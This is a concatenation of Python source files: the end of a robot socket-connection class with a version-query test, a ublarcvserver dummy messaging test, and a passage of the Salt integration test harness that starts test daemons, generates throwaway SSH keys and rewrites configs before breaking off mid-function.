    def recv_push_data(self, timeout=None, latest_data=False):
        """
        Receive push data

        If optional arg 'timeout' is None (the default), block if necessary
        until data arrives from the push port.  If 'timeout' is a
        non-negative number, it blocks at most 'timeout' seconds and returns
        None if no data came back from the robot push port within the time.
        Otherwise, return the data immediately.

        If optional arg 'latest_data' is set to True, it will return the
        latest data, instead of the data at the queue tail.
        """
        return self.__recv_data(self.push_socket, timeout, latest_data)

    def recv_event_data(self, timeout=None, latest_data=False):
        """
        Receive event data

        If optional arg 'timeout' is None (the default), block if necessary
        until data arrives from the event port.  If 'timeout' is a
        non-negative number, it blocks at most 'timeout' seconds and returns
        None if no data came back from the robot event port within the time.
        Otherwise, return the data immediately.

        If optional arg 'latest_data' is set to True, it will return the
        latest data, instead of the data at the queue tail.
        """
        return self.__recv_data(self.event_socket, timeout, latest_data)

    def __send_data(self, socket_obj, data):
        # NOTE(review): 'CONECTION' typo is kept — it is a runtime assert
        # message, not a comment.
        assert not self.is_shutdown, 'CONECTION INVALID'
        return socket_obj.send(data.encode('utf-8'))

    def __recv_data(self, socket_obj, timeout, latest_data):
        assert not self.is_shutdown, 'CONECTION INVALID'
        msg = None
        if latest_data:
            # Drain everything but the newest entry.
            while self.cmd_socket_msg_queue[socket_obj].qsize() > 1:
                self.cmd_socket_msg_queue[socket_obj].get()
        try:
            msg = self.cmd_socket_msg_queue[socket_obj].get(timeout=timeout)
        except Exception as e:
            # queue.Empty on timeout.
            return None
        else:
            return msg

    def __socket_recv_task(self):
        # Background loop: multiplex all watched sockets; the 2 s select()
        # timeout bounds how long close() has to wait.
        while not self.is_shutdown:
            rlist, _, _ = select.select(self.cmd_socket_list, [], [], 2)
            for s in rlist:
                msg, addr = s.recvfrom(4096)
                if self.cmd_socket_msg_queue[s].full():
                    # Drop the oldest entry so the newest always fits.
                    self.cmd_socket_msg_queue[s].get()
                self.cmd_socket_msg_queue[s].put(msg)

        # On shutdown, tear down every watched socket; errors (e.g. already
        # closed) are deliberately ignored.
        for s in self.cmd_socket_list:
            try:
                s.shutdown(socket.SHUT_RDWR)
            except Exception as e:
                pass


def test():
    """
    Test function

    Connect robot and query the version
    """
    robot = RobotConnection('192.168.42.2')
    robot.open()

    robot.send_data('command')
    print('send data to robot : command')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    robot.send_data('version ?')
    print('send data to robot : version ?')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    robot.send_data('stream on')
    print('send data to robot : stream on')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    result = robot.start_video_recv()
    if result:
        stream_data = robot.recv_video_data(5)
        print('recv video data from robot %s'%stream_data)
        robot.stop_video_recv()

    robot.send_data('stream off')
    print('send data to robot : stream off')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    robot.send_data('audio on')
    print('send data to robot : audio on')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    result = robot.start_audio_recv()
    if result:
        stream_data = robot.recv_audio_data(5)
        print('recv audio data from robot %s'%stream_data)
        robot.stop_audio_recv()

    robot.send_data('audio off')
    print('send data to robot : audio off')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    robot.send_data('quit')
    print('send data to robot : quit')
    recv = robot.recv_ctrl_data(5)
    print('recv data from robot : %s'%recv)

    robot.close()


if __name__ == '__main__':
    test()
py_dummy_test.py
# Ported from Python 2: `print` statements, `xrange` and `raw_input` are
# syntax/name errors on Python 3.
import os
import sys
import time
import logging
from multiprocessing import Process

from ublarcvserver import ublarcvserver
from ublarcvserver import DummyPyWorker, Broker, Client

"""
This script is used to test the Majordomo classes.
We implement a dummy setup where the client and worker just say hello
to each other. Also serves as an example.

We also setup the basic larcv client and worker, which pass larcv images
back and forth.
"""

verbose = True


def start_worker(endpoint, worker_verbose):
    """Create a DummyPyWorker, connect it to the broker, and run it forever."""
    print("start worker on", endpoint)
    # BUG FIX: honor the ``worker_verbose`` argument instead of a hard-coded
    # verbose=True.
    worker = DummyPyWorker(endpoint, verbose=worker_verbose)
    worker.connect()
    print("worker started:", worker.idname())
    worker.run()
    print("ending start-worker process")


def start_broker(bindpoint):
    """Create the broker bound to ``bindpoint`` and run its event loop."""
    print("start broker")
    broker = Broker(bind=bindpoint)
    broker.run()
    print("broker closed")


# Address the client/worker connect to, and the address the broker binds.
endpoint = "tcp://localhost:6005"
bindpoint = "tcp://*:6005"

logging.basicConfig(level=logging.DEBUG)

# Run the broker in its own daemon process so it dies with this script.
pbroker = Process(target=start_broker, args=(bindpoint,))
pbroker.daemon = True
pbroker.start()

# Run the worker in its own daemon process.
pworker = Process(target=start_worker, args=(endpoint, verbose))
pworker.daemon = True
pworker.start()
print("worker process created")

# The client runs in this process.
client = Client(endpoint)
client.connect()
print("client connected")

# Exchange five request/reply pairs with the dummy worker.
for x in range(5):
    print("REQUEST %d" % (x + 1))
    client.send("dummy", "hello world %d" % (x))
    msg = client.recv_all_as_list()
    print("reply from worker:", msg)
    time.sleep(2)

print("[ENTER] to end")
input()
__init__.py
# -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''

# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import json
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
    import pwd
except ImportError:
    # pwd is POSIX-only; absent on Windows.
    pass

# Import salt tests support dirs
from tests.support.paths import *  # pylint: disable=wildcard-import
from tests.support.processes import *  # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS

# Import Salt libs
import salt
import salt.config
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils
import salt.utils.network
import salt.utils.process
import salt.log.setup as salt_log_setup
from salt.ext import six
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.utils.nb_popen import NonBlockingPopen
from salt.exceptions import SaltClientError

try:
    from salt.utils.gitfs import HAS_GITPYTHON, HAS_PYGIT2
    HAS_GITFS = HAS_GITPYTHON or HAS_PYGIT2
except ImportError:
    HAS_GITFS = False

try:
    import salt.master
except ImportError:
    # Not required for raet tests
    pass

# Import 3rd-party libs
import yaml
import msgpack
import salt.ext.six as six  # NOTE(review): redundant with `from salt.ext import six` above
from salt.ext.six.moves import cStringIO

try:
    import salt.ext.six.moves.socketserver as socketserver
except ImportError:
    import socketserver

from tornado import gen
from tornado import ioloop

# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic

log = logging.getLogger(__name__)

# Ports handed out by get_unused_localhost_port(); the bound sockets are kept
# here (and closed at exit) so the OS cannot reassign a port mid-run.
_RUNTESTS_PORTS = {}


def get_unused_localhost_port():
    '''
    Return a random unused port on localhost
    '''
    usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
    usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # Binding to port 0 asks the kernel for an arbitrary free port.
    usock.bind(('127.0.0.1', 0))
    port = usock.getsockname()[1]
    if port in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521):
        # These ports are hardcoded in the test configuration
        port = get_unused_localhost_port()
        usock.close()
        return port

    DARWIN = True if sys.platform.startswith('darwin') else False
    BSD = True if 'bsd' in sys.platform else False

    if DARWIN and port in _RUNTESTS_PORTS:
        # Port was already handed out during this run; retry recursively.
        port = get_unused_localhost_port()
        usock.close()
        return port

    _RUNTESTS_PORTS[port] = usock

    if DARWIN or BSD:
        # On macOS/BSD the socket is released immediately; _RUNTESTS_PORTS
        # still records the port to avoid handing it out twice (see above).
        usock.close()

    return port


def close_open_sockets(sockets_dict):
    # Close and forget every reserved socket; registered with atexit below.
    for port in list(sockets_dict):
        sock = sockets_dict.pop(port)
        sock.close()


atexit.register(close_open_sockets, _RUNTESTS_PORTS)

# Port used by the log-forwarding socket server started by TestDaemon.
SALT_LOG_PORT = get_unused_localhost_port()


class ThreadingMixIn(socketserver.ThreadingMixIn):
    # Handler threads must not keep the test run alive at shutdown.
    daemon_threads = True


class ThreadedSocketServer(ThreadingMixIn, socketserver.TCPServer):

    allow_reuse_address = True

    def server_activate(self):
        # Event polled by request handlers so they stop on shutdown.
        self.shutting_down = threading.Event()
        socketserver.TCPServer.server_activate(self)
        #super(ThreadedSocketServer, self).server_activate()

    def server_close(self):
        if hasattr(self, 'shutting_down'):
            self.shutting_down.set()
        socketserver.TCPServer.server_close(self)
        #super(ThreadedSocketServer, self).server_close()


class SocketServerRequestHandler(socketserver.StreamRequestHandler):
    # Receives msgpack-encoded log records over TCP and replays them into the
    # local logging tree.

    def handle(self):
        unpacker = msgpack.Unpacker(encoding='utf-8')
        while not self.server.shutting_down.is_set():
            try:
                wire_bytes = 
self.request.recv(1024) if not wire_bytes: break unpacker.feed(wire_bytes) for record_dict in unpacker: record = logging.makeLogRecord(record_dict) logger = logging.getLogger(record.name) logger.handle(record) except (EOFError, KeyboardInterrupt, SystemExit): break except socket.error as exc: try: if exc.errno == errno.WSAECONNRESET: # Connection reset on windows break except AttributeError: # We're not on windows pass log.exception(exc) except Exception as exc: log.exception(exc) class TestDaemon(object): ''' Set up the master and minion daemons, and run related cases ''' MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120 def __init__(self, parser): self.parser = parser self.colors = salt.utils.get_colors(self.parser.options.no_colors is False) if salt.utils.is_windows(): # There's no shell color support on windows... for key in self.colors: self.colors[key] = '' def __enter__(self): ''' Start a master and minion ''' # Setup the multiprocessing logging queue listener salt_log_setup.setup_multiprocessing_logging_listener( self.master_opts ) # Set up PATH to mockbin self._enter_mockbin() if not HAS_GITFS: sys.stdout.write( ' * {LIGHT_RED}No suitable provider for git_pillar is installed. 
Install\n' ' GitPython or Pygit2.{ENDC}\n'.format( **self.colors ) ) if self.parser.options.transport == 'zeromq': self.start_zeromq_daemons() elif self.parser.options.transport == 'raet': self.start_raet_daemons() elif self.parser.options.transport == 'tcp': self.start_tcp_daemons() self.minion_targets = set(['minion', 'sub_minion']) self.pre_setup_minions() self.setup_minions() if getattr(self.parser.options, 'ssh', False): self.prep_ssh() if self.parser.options.sysinfo: try: print_header( '~~~~~~~ Versions Report ', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('~~~~~~~ Versions Report ', inline=True) print('\n'.join(salt.version.versions_report())) try: print_header( '~~~~~~~ Minion Grains Information ', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('~~~~~~~ Minion Grains Information ', inline=True) grains = self.client.cmd('minion', 'grains.items') minion_opts = self.minion_opts.copy() minion_opts['color'] = self.parser.options.no_colors is False salt.output.display_output(grains, 'grains', minion_opts) try: print_header( '=', sep='=', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('', sep='=', inline=True) try: return self finally: self.post_setup_minions() def start_daemon(self, cls, opts, start_fun): def start(cls, opts, start_fun): salt.utils.appendproctitle('{0}-{1}'.format(self.__class__.__name__, cls.__name__)) daemon = cls(opts) getattr(daemon, start_fun)() process = multiprocessing.Process(target=start, args=(cls, opts, start_fun)) process.start() return process def start_zeromq_daemons(self): ''' Fire up the daemons used for zeromq tests ''' if not salt.utils.network.ip_addrs(): sys.stdout.write( ' * {LIGHT_RED}Unable to list IPv4 addresses. Test suite startup will be\n' ' slower. 
Install iproute/ifconfig to fix this.{ENDC}\n'.format( **self.colors ) ) self.log_server = ThreadedSocketServer(('localhost', SALT_LOG_PORT), SocketServerRequestHandler) self.log_server_process = threading.Thread(target=self.log_server.serve_forever) self.log_server_process.daemon = True self.log_server_process.start() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-master ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.master_process = start_daemon( daemon_name='salt-master', daemon_id=self.master_opts['id'], daemon_log_prefix='salt-master/{}'.format(self.master_opts['id']), daemon_cli_script_name='master', daemon_config=self.master_opts, daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR, daemon_class=SaltMaster, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-master ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-master ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-minion ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.minion_process = start_daemon( daemon_name='salt-minion', daemon_id=self.master_opts['id'], daemon_log_prefix='salt-minion/{}'.format(self.minion_opts['id']), daemon_cli_script_name='minion', daemon_config=self.minion_opts, daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR, daemon_class=SaltMinion, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-minion ... 
STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.sub_minion_process = start_daemon( daemon_name='sub salt-minion', daemon_id=self.master_opts['id'], daemon_log_prefix='sub-salt-minion/{}'.format(self.sub_minion_opts['id']), daemon_cli_script_name='minion', daemon_config=self.sub_minion_opts, daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, daemon_class=SaltMinion, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.smaster_process = start_daemon( daemon_name='salt-smaster', daemon_id=self.syndic_master_opts['id'], daemon_log_prefix='salt-smaster/{}'.format(self.syndic_master_opts['id']), daemon_cli_script_name='master', daemon_config=self.syndic_master_opts, daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, daemon_class=SaltMaster, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting syndic salt-master ... 
STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() try: sys.stdout.write( ' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors) ) sys.stdout.flush() self.syndic_process = start_daemon( daemon_name='salt-syndic', daemon_id=self.syndic_opts['id'], daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']), daemon_cli_script_name='syndic', daemon_config=self.syndic_opts, daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, daemon_class=SaltSyndic, bin_dir_path=SCRIPT_DIR, fail_hard=True, start_timeout=30) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() except (RuntimeWarning, RuntimeError): sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors) ) sys.stdout.flush() def start_raet_daemons(self): ''' Fire up the raet daemons! 
''' import salt.daemons.flo self.master_process = self.start_daemon(salt.daemons.flo.IofloMaster, self.master_opts, 'start') self.minion_process = self.start_daemon(salt.daemons.flo.IofloMinion, self.minion_opts, 'tune_in') self.sub_minion_process = self.start_daemon(salt.daemons.flo.IofloMinion, self.sub_minion_opts, 'tune_in') # Wait for the daemons to all spin up time.sleep(5) # self.smaster_process = self.start_daemon(salt.daemons.flo.IofloMaster, # self.syndic_master_opts, # 'start') # no raet syndic daemon yet start_tcp_daemons = start_zeromq_daemons def prep_ssh(self): ''' Generate keys and start an ssh daemon on an alternate port ''' sys.stdout.write( ' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format( 'SSH server', **self.colors ) ) keygen = salt.utils.which('ssh-keygen') sshd = salt.utils.which('sshd') if not (keygen and sshd): print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!') return if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR): os.makedirs(RUNTIME_VARS.TMP_CONF_DIR) # Generate client key pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub') priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test') if os.path.exists(pub_key_test_file): os.remove(pub_key_test_file) if os.path.exists(priv_key_test_file): os.remove(priv_key_test_file) keygen_process = subprocess.Popen( [keygen, '-t', 'ecdsa', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'key_test', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=RUNTIME_VARS.TMP_CONF_DIR ) _, keygen_err = keygen_process.communicate() if keygen_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_err))) sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config') shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR) auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub') # Generate server key server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server') if not 
os.path.exists(server_key_dir): os.makedirs(server_key_dir) server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key') server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub') server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key') server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub') server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key') server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub') for server_key_file in (server_dsa_priv_key_file, server_dsa_pub_key_file, server_ecdsa_priv_key_file, server_ecdsa_pub_key_file, server_ed25519_priv_key_file, server_ed25519_pub_key_file): if os.path.exists(server_key_file): os.remove(server_key_file) keygen_process_dsa = subprocess.Popen( [keygen, '-t', 'dsa', '-b', '1024', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_dsa_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_dsa_err = keygen_process_dsa.communicate() if keygen_dsa_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_dsa_err))) keygen_process_ecdsa = subprocess.Popen( [keygen, '-t', 'ecdsa', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_ecdsa_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_escda_err = keygen_process_ecdsa.communicate() if keygen_escda_err: print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_escda_err))) keygen_process_ed25519 = subprocess.Popen( [keygen, '-t', 'ed25519', '-b', '521', '-C', '"$(whoami)@$(hostname)-$(date -I)"', '-f', 'ssh_host_ed25519_key', '-P', ''], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=server_key_dir ) _, keygen_ed25519_err = keygen_process_ed25519.communicate() if keygen_ed25519_err: print('ssh-keygen had errors: 
{0}'.format(salt.utils.to_str(keygen_ed25519_err))) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config: ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file)) if not keygen_dsa_err: ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file)) if not keygen_escda_err: ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file)) if not keygen_ed25519_err: ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file)) self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid') self.sshd_process = subprocess.Popen( [sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True, cwd=RUNTIME_VARS.TMP_CONF_DIR ) _, sshd_err = self.sshd_process.communicate() if sshd_err: print('sshd had errors on startup: {0}'.format(salt.utils.to_str(sshd_err))) else: os.environ['SSH_DAEMON_RUNNING'] = 'True' roster_path = os.path.join(FILES, 'conf/_ssh/roster') shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster: roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER)) roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')) sys.stdout.write( ' {LIGHT_GREEN}STARTED!\n{ENDC}'.format( **self.colors ) ) @classmethod def config(cls, role): ''' Return a configuration for a master/minion/syndic. Currently these roles are: * master * minion * syndic * syndic_master * sub_minion ''' return RUNTIME_VARS.RUNTIME_CONFIGS[role] @classmethod def config_location(cls): return RUNTIME_VARS.TMP_CONF_DIR @property def client(self): ''' Return a local client which will be used for example to ping and sync the test minions. This client is defined as a class attribute because its creation needs to be deferred to a latter stage. If created it on `__enter__` like it previously was, it would not receive the master events. 
        '''
        if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
            # Cached process-wide so every caller shares one local client
            RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
                mopts=self.master_opts
            )
        return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']

    @classmethod
    def transplant_configs(cls, transport='zeromq'):
        '''
        Rebuild the temporary test configuration tree: read the shipped
        master/minion/syndic/syndic_master/sub_minion config files, point
        their paths/users at the runtime temp directories, adjust transport
        settings, write them back as YAML, reload them through salt.config
        and create the directory layout the daemons expect.
        '''
        if os.path.isdir(RUNTIME_VARS.TMP_CONF_DIR):
            shutil.rmtree(RUNTIME_VARS.TMP_CONF_DIR)
        os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
        os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
        os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
        os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
        print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
        # Start each run with an empty salt-ssh known_hosts file
        tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
        with salt.utils.fopen(tests_known_hosts_file, 'w') as known_hosts:
            known_hosts.write('')

        # This master connects to syndic_master via a syndic
        master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
        master_opts['known_hosts_file'] = tests_known_hosts_file
        master_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
        master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        master_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
        master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
        master_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki', 'master')

        # This is the syndic for master
        # Let's start with a copy of the syndic master configuration
        syndic_opts = copy.deepcopy(master_opts)
        # Let's update with the syndic configuration
        syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
        syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
        syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR

        # This minion connects to master
        minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
        minion_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
        minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        minion_opts['config_dir'] = RUNTIME_VARS.TMP_CONF_DIR
        minion_opts['root_dir'] = os.path.join(TMP, 'rootdir')
        minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir', 'pki')
        minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
        minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')

        # This sub_minion also connects to master
        sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
        sub_minion_opts['cachedir'] = os.path.join(TMP, 'rootdir-sub-minion', 'cache')
        sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        sub_minion_opts['config_dir'] = RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR
        sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
        sub_minion_opts['pki_dir'] = os.path.join(TMP, 'rootdir-sub-minion', 'pki', 'minion')
        sub_minion_opts['hosts.file'] = os.path.join(TMP, 'rootdir', 'hosts')
        sub_minion_opts['aliases.file'] = os.path.join(TMP, 'rootdir', 'aliases')

        # This is the master of masters
        syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
        syndic_master_opts['cachedir'] = os.path.join(TMP, 'rootdir-syndic-master', 'cache')
        syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
        syndic_master_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR
        syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
        syndic_master_opts['pki_dir'] = os.path.join(TMP, 'rootdir-syndic-master', 'pki', 'master')

        if transport == 'raet':
            master_opts['transport'] = 'raet'
            master_opts['raet_port'] = 64506
            minion_opts['transport'] = 'raet'
            minion_opts['raet_port'] = 64510
            sub_minion_opts['transport'] = 'raet'
            sub_minion_opts['raet_port'] = 64520
            # syndic_master_opts['transport'] = 'raet'

        if transport == 'tcp':
            master_opts['transport'] = 'tcp'
            minion_opts['transport'] = 'tcp'
            sub_minion_opts['transport'] = 'tcp'
            syndic_master_opts['transport'] = 'tcp'

        # Set up config options that require internal data
        master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
            'base': [os.path.join(FILES, 'pillar', 'base')]
        }
        master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
            'base': [
                os.path.join(FILES, 'file', 'base'),
                # Let's support runtime created files that can be used like:
                #   salt://my-temp-file.txt
                RUNTIME_VARS.TMP_STATE_TREE
            ],
            # Alternate root to test __env__ choices
            'prod': [
                os.path.join(FILES, 'file', 'prod'),
                RUNTIME_VARS.TMP_PRODENV_STATE_TREE
            ]
        }
        # Sync modules to every minion as soon as it announces itself
        master_opts.setdefault('reactor', []).append(
            {
                'salt/minion/*/start': [
                    os.path.join(FILES, 'reactor-sync-minion.sls')
                ],
            }
        )
        for opts_dict in (master_opts, syndic_master_opts):
            if 'ext_pillar' not in opts_dict:
                opts_dict['ext_pillar'] = []
            # 'type' is the Windows equivalent of 'cat'
            if salt.utils.is_windows():
                opts_dict['ext_pillar'].append(
                    {'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
            else:
                opts_dict['ext_pillar'].append(
                    {'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})

        for opts_dict in (master_opts, syndic_master_opts):
            # We need to copy the extension modules into the new master root_dir or
            # it will be prefixed by it
            new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
